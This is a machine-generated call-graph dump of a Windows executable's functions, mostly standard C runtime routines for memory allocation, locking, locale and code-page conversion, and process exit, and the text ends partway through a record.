40eafb 14457->14458 14458->14483 14501 40ef42 14458->14501 14459->14483 14461 40eb31 GetModuleFileNameA 14464 40eb4f 14461->14464 14468 40eb72 _strlen 14461->14468 14466 40ef42 _strcpy_s 60 API calls 14464->14466 14467 40eb5f 14466->14467 14467->14468 14470 40e61c __invoke_watson 10 API calls 14467->14470 14469 40ebb5 14468->14469 14517 411da6 14468->14517 14526 413ce7 14469->14526 14470->14468 14475 40ebd9 14477 413ce7 _strcat_s 60 API calls 14475->14477 14476 40e61c __invoke_watson 10 API calls 14476->14475 14478 40ebed 14477->14478 14480 40ebfe 14478->14480 14481 40e61c __invoke_watson 10 API calls 14478->14481 14479 40e61c __invoke_watson 10 API calls 14479->14469 14535 413b7e 14480->14535 14481->14480 14484 40e7ee 14483->14484 14573 40e7c3 GetModuleHandleW 14484->14573 14490 411c7e 14487->14490 14489 40d66a 14489->14423 14489->14424 14490->14489 14491 411c95 Sleep 14490->14491 14577 40b84d 14490->14577 14491->14490 14607 40d606 LeaveCriticalSection 14492->14607 14494 40d6de 14494->14418 14496 413d6a 14495->14496 14497 40bfc1 __filbuf 63 API calls 14496->14497 14500 40ec54 14496->14500 14498 413d8d 14497->14498 14499 40e744 __filbuf 6 API calls 14498->14499 14499->14500 14500->14444 14500->14446 14502 40ef5a 14501->14502 14503 40ef53 14501->14503 14504 40bfc1 __filbuf 63 API calls 14502->14504 14503->14502 14508 40ef80 14503->14508 14505 40ef5f 14504->14505 14506 40e744 __filbuf 6 API calls 14505->14506 14507 40eb1d 14506->14507 14507->14461 14510 40e61c 14507->14510 14508->14507 14509 40bfc1 __filbuf 63 API calls 14508->14509 14509->14505 14562 40ba30 14510->14562 14512 40e649 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14513 40e725 GetCurrentProcess TerminateProcess 14512->14513 14514 40e719 __invoke_watson 14512->14514 14564 40ce09 14513->14564 14514->14513 14516 40e742 14516->14461 14521 411db8 14517->14521 14518 411dbc 14519 40bfc1 __filbuf 63 API calls 14518->14519 14520 40eba2 14518->14520 14525 411dd8 14519->14525 14520->14469 14520->14479 14521->14518 14521->14520 14523 411e02 14521->14523 14522 40e744 __filbuf 6 API calls 14522->14520 14523->14520 14524 40bfc1 __filbuf 63 API calls 14523->14524 14524->14525 14525->14522 14527 413cff 14526->14527 14529 413cf8 14526->14529 14528 40bfc1 __filbuf 63 API calls 14527->14528 14534 413d04 14528->14534 14529->14527 14531 413d33 14529->14531 14530 40e744 __filbuf 6 API calls 14532 40ebc8 14530->14532 14531->14532 14533 40bfc1 __filbuf 63 API calls 14531->14533 14532->14475 14532->14476 14533->14534 14534->14530 14536 4104e0 _raise 6 API calls 14535->14536 14537 413b8e 14536->14537 14538 413ba1 LoadLibraryA 14537->14538 14540 413c29 14537->14540 14539 413bb6 GetProcAddress 14538->14539 14547 413ccb 14538->14547 14541 413bcc 14539->14541 14539->14547 14544 4104e9 __decode_pointer 6 API calls 14540->14544 14557 413c53 14540->14557 14545 41046e __encode_pointer 6 API calls 14541->14545 14542 4104e9 __decode_pointer 6 API calls 14542->14547 14543 4104e9 __decode_pointer 6 API calls 14554 413c96 14543->14554 14548 413c46 14544->14548 14546 413bd2 GetProcAddress 14545->14546 14549 41046e __encode_pointer 6 API calls 14546->14549 14547->14483 14550 4104e9 __decode_pointer 6 API calls 14548->14550 14551 413be7 GetProcAddress 14549->14551 14550->14557 14552 41046e __encode_pointer 6 API calls 14551->14552 14553 413bfc GetProcAddress 14552->14553 14555 41046e __encode_pointer 6 API calls 14553->14555 14556 4104e9 __decode_pointer 6 API calls 14554->14556 14559 413c7e 14554->14559 14558 413c11 14555->14558 14556->14559 14557->14543 14557->14559 14558->14540 14560 413c1b GetProcAddress 14558->14560 14559->14542 14561 41046e __encode_pointer 6 API calls 14560->14561 14561->14540 14563 40ba3c __VEC_memzero 14562->14563 14563->14512 14565 40ce11 14564->14565 14566 40ce13 IsDebuggerPresent 14564->14566 14565->14516 14572 4138fc 14566->14572 14569 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 14570 413723 __invoke_watson 14569->14570 14571 41372b GetCurrentProcess TerminateProcess 14569->14571 14570->14571 14571->14516 14572->14569 14574 40e7d7 GetProcAddress 14573->14574 14575 40e7ec ExitProcess 14573->14575 14574->14575 14576 40e7e7 CorExitProcess 14574->14576 14576->14575 14578 40b900 14577->14578 14582 40b85f 14577->14582 14579 40d2e3 __calloc_impl 6 API calls 14578->14579 14581 40b906 14579->14581 14580 40b870 14580->14582 14583 40ec4d __FF_MSGBANNER 62 API calls 14580->14583 14586 40eaa2 __NMSG_WRITE 62 API calls 14580->14586 14588 40e7ee __mtinitlocknum 4 API calls 14580->14588 14584 40bfc1 __filbuf 62 API calls 14581->14584 14582->14580 14587 40b8bc RtlAllocateHeap 14582->14587 14589 40b8f8 14582->14589 14590 40b8ec 14582->14590 14591 40d2e3 __calloc_impl 6 API calls 14582->14591 14593 40b8f1 14582->14593 14595 40b7fe 14582->14595 14583->14580 14584->14589 14586->14580 14587->14582 14588->14580 14589->14490 14592 40bfc1 __filbuf 62 API calls 14590->14592 14591->14582 14592->14593 14594 40bfc1 __filbuf 62 API calls 14593->14594 14594->14589 14596 40b80a __fsopen 14595->14596 14597 40b83b __fsopen 14596->14597 14598 40d6e0 __lock 63 API calls 14596->14598 14597->14582 14599 40b820 14598->14599 14600 40def2 ___sbh_alloc_block 5 API calls 14599->14600 14601 40b82b 14600->14601 14603 40b844 14601->14603 14606 40d606 LeaveCriticalSection 14603->14606 14605 40b84b 14605->14597 14606->14605 14607->14494 14609 40daa0 HeapAlloc 14608->14609 14610 40da6c HeapReAlloc 14608->14610 14612 40dac3 VirtualAlloc 14609->14612 14614 40da8a 14609->14614 14611 40da8e 14610->14611 14610->14614 14611->14609 14613 40dadd HeapFree 14612->14613 14612->14614 14613->14614 14614->14383 14616 40db20 VirtualAlloc 14615->14616 14618 40db67 14616->14618 14618->14379 14619->14386 14620->14319 14639 40d606 LeaveCriticalSection 14621->14639 14623 41066c 14623->14329 14625 4145f0 InterlockedIncrement 14624->14625 14626 4145f3 14624->14626 14625->14626 14627 414600 14626->14627 14628 4145fd InterlockedIncrement 14626->14628 14629 41460a InterlockedIncrement 14627->14629 14630 41460d 14627->14630 14628->14627 14629->14630 14631 414617 InterlockedIncrement 14630->14631 14633 41461a 14630->14633 14631->14633 14632 414633 InterlockedIncrement 14632->14633 14633->14632 14634 414643 InterlockedIncrement 14633->14634 14635 41464e InterlockedIncrement 14633->14635 14634->14633 14635->14332 14640 40d606 LeaveCriticalSection 14636->14640 14638 4106ba 14638->14334 14639->14623 14640->14638 14641->14128 14644 41265c 14642->14644 14646 4126c9 14644->14646 14652 416836 14644->14652 14645 4127c7 14645->14174 14645->14175 14646->14645 14647 416836 73 API calls _parse_cmdline 14646->14647 14647->14646 14649 414474 14648->14649 14650 41447b 14648->14650 14874 4142d1 14649->14874 14650->14168 14655 4167e3 14652->14655 14658 40ec86 14655->14658 14659 40ec99 14658->14659 14663 40ece6 14658->14663 14666 410735 14659->14666 14662 40ecc6 14662->14663 14686 413fcc 14662->14686 14663->14644 14667 4106bc __getptd_noexit 63 API calls 14666->14667 14668 41073d 14667->14668 14669 40ec9e 14668->14669 14670 40e79a __amsg_exit 63 API calls 14668->14670 14669->14662 14671 414738 14669->14671 14670->14669 14672 414744 __fsopen 14671->14672 14673 410735 __getptd 63 API calls 14672->14673 14674 414749 14673->14674 14675 414777 14674->14675 14677 41475b 14674->14677 14676 40d6e0 __lock 63 API calls 14675->14676 14679 41477e 14676->14679 14678 410735 __getptd 63 API calls 14677->14678 14681 414760 14678->14681 14702 4146fa 14679->14702 14683 41476e __fsopen 14681->14683 14685 40e79a __amsg_exit 63 API calls 14681->14685 14683->14662 14685->14683 14687 413fd8 __fsopen 14686->14687 14688 410735 __getptd 63 API calls 14687->14688 14689 413fdd 14688->14689 14690 413fef 14689->14690 14691 40d6e0 __lock 63 API calls 14689->14691 14693 413ffd __fsopen 14690->14693 14697 40e79a __amsg_exit 63 API calls 14690->14697 14692 41400d 14691->14692 14694 414056 14692->14694 14695 414024 InterlockedDecrement 14692->14695 14696 41403e InterlockedIncrement 14692->14696 14693->14663 14870 414067 14694->14870 14695->14696 14699 41402f 14695->14699 14696->14694 14697->14693 14699->14696 14700 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14699->14700 14701 41403d 14700->14701 14701->14696 14703 4146fe 14702->14703 14709 414730 14702->14709 14704 4145d2 ___addlocaleref 8 API calls 14703->14704 14703->14709 14705 414711 14704->14705 14705->14709 14713 414661 14705->14713 14710 4147a2 14709->14710 14869 40d606 LeaveCriticalSection 14710->14869 14712 4147a9 14712->14681 14714 414672 InterlockedDecrement 14713->14714 14715 4146f5 14713->14715 14716 414687 InterlockedDecrement 14714->14716 14717 41468a 14714->14717 14715->14709 14727 414489 14715->14727 14716->14717 14718 414694 InterlockedDecrement 14717->14718 14719 414697 14717->14719 14718->14719 14720 4146a1 InterlockedDecrement 14719->14720 14721 4146a4 14719->14721 14720->14721 14722 4146ae InterlockedDecrement 14721->14722 14724 4146b1 14721->14724 14722->14724 14723 4146ca InterlockedDecrement 14723->14724 14724->14723 14725 4146da InterlockedDecrement 14724->14725 14726 4146e5 InterlockedDecrement 14724->14726 14725->14724 14726->14715 14728 41450d 14727->14728 14731 4144a0 14727->14731 14729 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14728->14729 14730 41455a 14728->14730 14732 41452e 14729->14732 14740 414581 14730->14740 14781 417667 14730->14781 14731->14728 14738 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14731->14738 14741 4144d4 14731->14741 14734 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14732->14734 14739 414541 14734->14739 14736 4145c6 14743 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14736->14743 14737 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14737->14740 14744 4144c9 14738->14744 14745 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14739->14745 14740->14736 14746 40b6b5 63 API calls ___crtGetEnvironmentStringsA 14740->14746 14747 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14741->14747 14756 4144f5 14741->14756 14742 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14748 414502 14742->14748 14749 4145cc 14743->14749 14757 417841 14744->14757 14751 41454f 14745->14751 14746->14740 14752 4144ea 14747->14752 14753 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14748->14753 14749->14709 14754 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14751->14754 14773 4177fc 14752->14773 14753->14728 14754->14730 14756->14742 14758 4178cb 14757->14758 14759 41784e 14757->14759 14758->14741 14760 41785f 14759->14760 14761 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14759->14761 14762 417871 14760->14762 14763 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14760->14763 14761->14760 14764 417883 14762->14764 14765 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14762->14765 14763->14762 14766 417895 14764->14766 14768 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14764->14768 14765->14764 14767 4178a7 14766->14767 14769 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14766->14769 14770 4178b9 14767->14770 14771 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14767->14771 14768->14766 14769->14767 14770->14758 14772 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14770->14772 14771->14770 14772->14758 14774 417809 14773->14774 14780 41783d 14773->14780 14775 417819 14774->14775 14777 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14774->14777 14776 41782b 14775->14776 14778 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14775->14778 14779 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14776->14779 14776->14780 14777->14775 14778->14776 14779->14780 14780->14756 14782 41457a 14781->14782 14783 417678 14781->14783 14782->14737 14784 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14783->14784 14785 417680 14784->14785 14786 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14785->14786 14787 417688 14786->14787 14788 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14787->14788 14789 417690 14788->14789 14790 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14789->14790 14791 417698 14790->14791 14792 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14791->14792 14793 4176a0 14792->14793 14794 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14793->14794 14795 4176a8 14794->14795 14796 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14795->14796 14797 4176af 14796->14797 14798 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14797->14798 14799 4176b7 14798->14799 14800 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14799->14800 14801 4176bf 14800->14801 14802 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14801->14802 14803 4176c7 14802->14803 14804 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14803->14804 14805 4176cf 14804->14805 14806 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14805->14806 14807 4176d7 14806->14807 14808 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14807->14808 14809 4176df 14808->14809 14810 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14809->14810 14811 4176e7 14810->14811 14812 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14811->14812 14813 4176ef 14812->14813 14814 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14813->14814 14815 4176f7 14814->14815 14816 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14815->14816 14817 417702 14816->14817 14818 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14817->14818 14819 41770a 14818->14819 14820 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14819->14820 14821 417712 14820->14821 14822 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14821->14822 14823 41771a 14822->14823 14824 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14823->14824 14825 417722 14824->14825 14826 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14825->14826 14827 41772a 14826->14827 14828 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14827->14828 14829 417732 14828->14829 14830 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14829->14830 14831 41773a 14830->14831 14832 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14831->14832 14833 417742 14832->14833 14834 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14833->14834 14835 41774a 14834->14835 14836 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14835->14836 14837 417752 14836->14837 14838 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14837->14838 14839 41775a 14838->14839 14840 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14839->14840 14841 417762 14840->14841 14842 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14841->14842 14843 41776a 14842->14843 14844 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14843->14844 14845 417772 14844->14845 14846 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14845->14846 14847 41777a 14846->14847 14848 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14847->14848 14849 417788 14848->14849 14850 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14849->14850 14851 417793 14850->14851 14852 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14851->14852 14853 41779e 14852->14853 14854 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14853->14854 14855 4177a9 14854->14855 14856 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14855->14856 14857 4177b4 14856->14857 14858 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14857->14858 14859 4177bf 14858->14859 14860 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14859->14860 14861 4177ca 14860->14861 14862 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14861->14862 14863 4177d5 14862->14863 14864 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14863->14864 14865 4177e0 14864->14865 14866 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14865->14866 14867 4177eb 14866->14867 14868 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14867->14868 14868->14782 14869->14712 14873 40d606 LeaveCriticalSection 14870->14873 14872 41406e 14872->14690 14873->14872 14875 4142dd __fsopen 14874->14875 14876 410735 __getptd 63 API calls 14875->14876 14877 4142e6 14876->14877 14878 413fcc __setmbcp 65 API calls 14877->14878 14879 4142f0 14878->14879 14905 414070 14879->14905 14882 411c75 __malloc_crt 63 API calls 14883 414311 14882->14883 14884 414430 __fsopen 14883->14884 14912 4140ec 14883->14912 14884->14650 14887 414341 InterlockedDecrement 14889 414351 14887->14889 14890 414362 InterlockedIncrement 14887->14890 14888 41443d 14888->14884 14892 414450 14888->14892 14893 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14888->14893 14889->14890 14895 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14889->14895 14890->14884 14891 414378 14890->14891 14891->14884 14897 40d6e0 __lock 63 API calls 14891->14897 14894 40bfc1 __filbuf 63 API calls 14892->14894 14893->14892 14894->14884 14896 414361 14895->14896 14896->14890 14899 41438c InterlockedDecrement 14897->14899 14900 414408 14899->14900 14901 41441b InterlockedIncrement 14899->14901 14900->14901 14903 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14900->14903 14922 414432 14901->14922 14904 41441a 14903->14904 14904->14901 14906 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14905->14906 14907 414084 14906->14907 14908 4140ad 14907->14908 14909 41408f GetOEMCP 14907->14909 14910 4140b2 GetACP 14908->14910 14911 41409f 14908->14911 14909->14911 14910->14911 14911->14882 14911->14884 14913 414070 getSystemCP 75 API calls 14912->14913 14914 41410c 14913->14914 14915 414117 setSBCS 14914->14915 14917 41415b IsValidCodePage 14914->14917 14920 414180 _memset __setmbcp_nolock 14914->14920 14916 40ce09 ___ansicp 5 API calls 14915->14916 14918 4142cf 14916->14918 14917->14915 14919 41416d GetCPInfo 14917->14919 14918->14887 14918->14888 14919->14915 14919->14920 14925 413e39 GetCPInfo 14920->14925 15058 40d606 LeaveCriticalSection 14922->15058 14924 414439 14924->14884 14926 413f1f 14925->14926 14928 413e6d _memset 14925->14928 14930 40ce09 ___ansicp 5 API calls 14926->14930 14935 417625 14928->14935 14933 413fca 14930->14933 14933->14920 14934 417426 ___crtLCMapStringA 98 API calls 14934->14926 14936 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14935->14936 14937 417638 14936->14937 14945 41746b 14937->14945 14940 417426 14941 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14940->14941 14942 417439 14941->14942 15011 417081 14942->15011 14946 4174b7 14945->14946 14947 41748c GetStringTypeW 14945->14947 14948 4174a4 14946->14948 14950 41759e 14946->14950 14947->14948 14949 4174ac GetLastError 14947->14949 14951 4174f0 MultiByteToWideChar 14948->14951 14967 417598 14948->14967 14949->14946 14973 417a20 GetLocaleInfoA 14950->14973 14957 41751d 14951->14957 14951->14967 14953 40ce09 ___ansicp 5 API calls 14955 413eda 14953->14955 14955->14940 14956 4175ef GetStringTypeA 14961 41760a 14956->14961 14956->14967 14958 40b84d _malloc 63 API calls 14957->14958 14962 417532 _memset __crtGetStringTypeA_stat 14957->14962 14958->14962 14960 41756b MultiByteToWideChar 14964 417581 GetStringTypeW 14960->14964 14965 417592 14960->14965 14966 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14961->14966 14962->14960 14962->14967 14964->14965 14969 4147ae 14965->14969 14966->14967 14967->14953 14970 4147ba 14969->14970 14971 4147cb 14969->14971 14970->14971 14972 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14970->14972 14971->14967 14972->14971 14974 417a53 14973->14974 14975 417a4e 14973->14975 15004 416f54 14974->15004 14977 40ce09 ___ansicp 5 API calls 14975->14977 14978 4175c2 14977->14978 14978->14956 14978->14967 14979 417a69 14978->14979 14980 417aa9 GetCPInfo 14979->14980 14984 417b33 14979->14984 14981 417ac0 14980->14981 14982 417b1e MultiByteToWideChar 14980->14982 14981->14982 14985 417ac6 GetCPInfo 14981->14985 14982->14984 14988 417ad9 _strlen 14982->14988 14983 40ce09 ___ansicp 5 API calls 14986 4175e3 14983->14986 14984->14983 14985->14982 14987 417ad3 14985->14987 14986->14956 14986->14967 14987->14982 14987->14988 14989 40b84d _malloc 63 API calls 14988->14989 14993 417b0b _memset __crtGetStringTypeA_stat 14988->14993 14989->14993 14990 417b68 MultiByteToWideChar 14991 417b80 14990->14991 14992 417b9f 14990->14992 14995 417ba4 14991->14995 14996 417b87 WideCharToMultiByte 14991->14996 14994 4147ae __freea 63 API calls 14992->14994 14993->14984 14993->14990 14994->14984 14997 417bc3 14995->14997 14998 417baf WideCharToMultiByte 14995->14998 14996->14992 14999 411cba __calloc_crt 63 API calls 14997->14999 14998->14992 14998->14997 15000 417bcb 14999->15000 15000->14992 15001 417bd4 WideCharToMultiByte 15000->15001 15001->14992 15002 417be6 15001->15002 15003 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 15002->15003 15003->14992 15007 41a354 15004->15007 15008 41a36d 15007->15008 15009 41a125 strtoxl 87 API calls 15008->15009 15010 416f65 15009->15010 15010->14975 15012 4170a2 LCMapStringW 15011->15012 15016 4170bd 15011->15016 15013 4170c5 GetLastError 15012->15013 15012->15016 15013->15016 15014 4172bb 15018 417a20 ___ansicp 87 API calls 15014->15018 15015 417117 15017 417130 MultiByteToWideChar 15015->15017 15039 4172b2 15015->15039 15016->15014 15016->15015 15025 41715d 15017->15025 15017->15039 15020 4172e3 15018->15020 15019 40ce09 ___ansicp 5 API calls 15021 413efa 15019->15021 15022 4173d7 LCMapStringA 15020->15022 15023 4172fc 15020->15023 15020->15039 15021->14934 15057 417333 15022->15057 15026 417a69 ___convertcp 70 API calls 15023->15026 15024 4171ae MultiByteToWideChar 15028 4171c7 LCMapStringW 15024->15028 15050 4172a9 15024->15050 15030 40b84d _malloc 63 API calls 15025->15030 15035 417176 __crtGetStringTypeA_stat 15025->15035 15027 41730e 15026->15027 15031 417318 LCMapStringA 15027->15031 15027->15039 15033 4171e8 15028->15033 15028->15050 15029 4173fe 15038 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 15029->15038 15029->15039 15030->15035 15036 41733a 15031->15036 15031->15057 15032 4147ae __freea 63 API calls 15032->15039 15037 4171f1 15033->15037 15041 41721a 15033->15041 15034 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 15034->15029 15035->15024 15035->15039 15044 40b84d _malloc 63 API calls 15036->15044 15049 41734b _memset __crtGetStringTypeA_stat 15036->15049 15040 417203 LCMapStringW 15037->15040 15037->15050 15038->15039 15039->15019 15040->15050 15043 40b84d _malloc 63 API calls 15041->15043 15051 417235 __crtGetStringTypeA_stat 15041->15051 15042 417269 LCMapStringW 15045 417281 WideCharToMultiByte 15042->15045 15046 4172a3 15042->15046 15043->15051 15044->15049 15045->15046 15047 4147ae __freea 63 API calls 15046->15047 15047->15050 15048 417389 LCMapStringA 15052 4173a5 15048->15052 15053 4173a9 15048->15053 15049->15048 15049->15057 15050->15032 15051->15042 15051->15050 15056 4147ae __freea 63 API calls 15052->15056 15055 417a69 ___convertcp 70 API calls 15053->15055 15055->15052 15056->15057 15057->15029 15057->15034 15058->14924 15060 41358c 15059->15060 15061 41046e __encode_pointer 6 API calls 15060->15061 15062 4135a4 15060->15062 15061->15060 15062->14198 15066 40d281 15063->15066 15065 40d2ca 15065->14200 15067 40d28d __fsopen 15066->15067 15074 40e806 15067->15074 15073 40d2ae __fsopen 15073->15065 15075 40d6e0 __lock 63 API calls 15074->15075 15076 40d292 15075->15076 15077 40d196 15076->15077 15078 4104e9 __decode_pointer 6 API calls 15077->15078 15079 40d1aa 15078->15079 15080 4104e9 __decode_pointer 6 API calls 15079->15080 15081 40d1ba 15080->15081 15082 40d23d 15081->15082 15097 40e56a 15081->15097 15094 40d2b7 15082->15094 15084 40d224 15085 41046e __encode_pointer 6 API calls 15084->15085 15086 40d232 15085->15086 15089 41046e __encode_pointer 6 API calls 15086->15089 15087 40d1fc 15087->15082 15091 411d06 __realloc_crt 73 API calls 15087->15091 15092 40d212 15087->15092 15088 40d1d8 15088->15084 15088->15087 15110 411d06 15088->15110 15089->15082 15091->15092 15092->15082 15093 41046e __encode_pointer 6 API calls 15092->15093 15093->15084 15159 40e80f 15094->15159 15098 40e576 __fsopen 15097->15098 15099 40e5a3 15098->15099 15100 40e586 15098->15100 15101 40e5e4 HeapSize 15099->15101 15103 40d6e0 __lock 63 API calls 15099->15103 15102 40bfc1 __filbuf 63 API calls 15100->15102 15106 40e59b __fsopen 15101->15106 15104 40e58b 15102->15104 15107 40e5b3 ___sbh_find_block 15103->15107 15105 40e744 __filbuf 6 API calls 15104->15105 15105->15106 15106->15088 15115 40e604 15107->15115 15112 411d0f 15110->15112 15113 411d4e 15112->15113 15114 411d2f Sleep 15112->15114 15119 40e34f 15112->15119 15113->15087 15114->15112 15118 40d606 LeaveCriticalSection 15115->15118 15117 40e5df 15117->15101 15117->15106 15118->15117 15120 40e35b __fsopen 15119->15120 15121 40e370 15120->15121 15122 40e362 15120->15122 15124 40e383 15121->15124 15125 40e377 15121->15125 15123 40b84d _malloc 63 API calls 15122->15123 15140 40e36a __fsopen _realloc 15123->15140 15132 40e4f5 15124->15132 15153 40e390 _memcpy_s ___sbh_resize_block ___sbh_find_block 15124->15153 15126 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 15125->15126 15126->15140 15127 40e528 15128 40d2e3 __calloc_impl 6 API calls 15127->15128 15131 40e52e 15128->15131 15129 40d6e0 __lock 63 API calls 15129->15153 15130 40e4fa HeapReAlloc 15130->15132 15130->15140 15133 40bfc1 __filbuf 63 API calls 15131->15133 15132->15127 15132->15130 15134 40e54c 15132->15134 15135 40d2e3 __calloc_impl 6 API calls 15132->15135 15137 40e542 15132->15137 15133->15140 15136 40bfc1 __filbuf 63 API calls 15134->15136 15134->15140 15135->15132 15138 40e555 GetLastError 15136->15138 15141 40bfc1 __filbuf 63 API calls 15137->15141 15138->15140 15140->15112 15143 40e4c3 15141->15143 15142 40e41b HeapAlloc 15142->15153 15143->15140 15145 40e4c8 GetLastError 15143->15145 15144 40e470 HeapReAlloc 15144->15153 15145->15140 15146 40def2 ___sbh_alloc_block 5 API calls 15146->15153 15147 40e4db 15147->15140 15149 40bfc1 __filbuf 63 API calls 15147->15149 15148 40d2e3 __calloc_impl 6 API calls 15148->15153 15150 40e4e8 15149->15150 15150->15138 15150->15140 15151 40e4be 15152 40bfc1 __filbuf 63 API calls 15151->15152 15152->15143 15153->15127 15153->15129 15153->15140 15153->15142 15153->15144 15153->15146 15153->15147 15153->15148 15153->15151 15154 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 15153->15154 15155 40e493 15153->15155 15154->15153 15158 40d606 LeaveCriticalSection 15155->15158 15157 40e49a 15157->15153 15158->15157 15162 40d606 LeaveCriticalSection 15159->15162 15161 40d2bc 15161->15073 15162->15161 15166 40b9aa __fsopen _strnlen 15163->15166 15164 40b9b8 15165 40bfc1 __filbuf 63 API calls 15164->15165 15167 40b9bd 15165->15167 15166->15164 15169 40b9ec 15166->15169 15168 40e744 __filbuf 6 API calls 15167->15168 15173 40b9cd __fsopen 15168->15173 15170 40d6e0 __lock 63 API calls 15169->15170 15171 40b9f3 15170->15171 15220 40b917 15171->15220 15173->14204 15177 4017cc _memcpy_s 15176->15177 15177->14208 15180 40af70 15178->15180 15179 40b84d _malloc 63 API calls 15179->15180 15180->15179 15181 40af8a 15180->15181 15182 40d2e3 __calloc_impl 6 API calls 15180->15182 15186 40af8c std::bad_alloc::bad_alloc 15180->15186 15181->14213 15182->15180 15183 40afb2 15434 40af49 15183->15434 15186->15183 15187 40d2bd __cinit 74 API calls 15186->15187 15187->15183 15189 40afca 15191 401903 lstrlenA 15190->15191 15192 4018fc 15190->15192 15446 4017e0 15191->15446 15192->14236 15195 401940 GetLastError 15197 40194b MultiByteToWideChar 15195->15197 15198 40198d 15195->15198 15196 401996 15196->14236 15199 4017e0 73 API calls 15197->15199 15198->15196 15454 401030 GetLastError 15198->15454 15200 401970 MultiByteToWideChar 15199->15200 15200->15198 15203 40af66 75 API calls 15202->15203 15204 40187c 15203->15204 15205 401885 SysAllocString 15204->15205 15206 4018a4 15204->15206 15205->15206 15206->14238 15208 40231a SafeArrayUnaccessData 15207->15208 15208->14245 15210 4019df VariantClear 15209->15210 15211 4019aa InterlockedDecrement 15209->15211 15210->14253 15211->15210 15212 4019b8 15211->15212 15212->15210 15213 4019c2 SysFreeString 15212->15213 15214 4019c9 15212->15214 15213->15214 15463 40aec0 15214->15463 15217 401571 15216->15217 15219 401582 15216->15219 15469 40afe0 15217->15469 15219->14216 15219->15219 15221 40b930 15220->15221 15222 40b92c 15220->15222 15221->15222 15224 40b942 _strlen 15221->15224 15229 40eeab 15221->15229 15226 40ba18 15222->15226 15224->15222 15239 40edfb 15224->15239 15433 40d606 LeaveCriticalSection 15226->15433 15228 40ba1f 15228->15173 15230 40ef2b 15229->15230 15237 40eec6 15229->15237 15230->15224 15231 40eecc WideCharToMultiByte 15231->15230 15231->15237 15232 411cba __calloc_crt 63 API calls 15232->15237 15233 40eeef WideCharToMultiByte 15234 40ef37 15233->15234 15233->15237 15236 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 15234->15236 15236->15230 15237->15230 15237->15231 15237->15232 15237->15233 15238 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 15237->15238 15242 414d44 15237->15242 15238->15237 15334 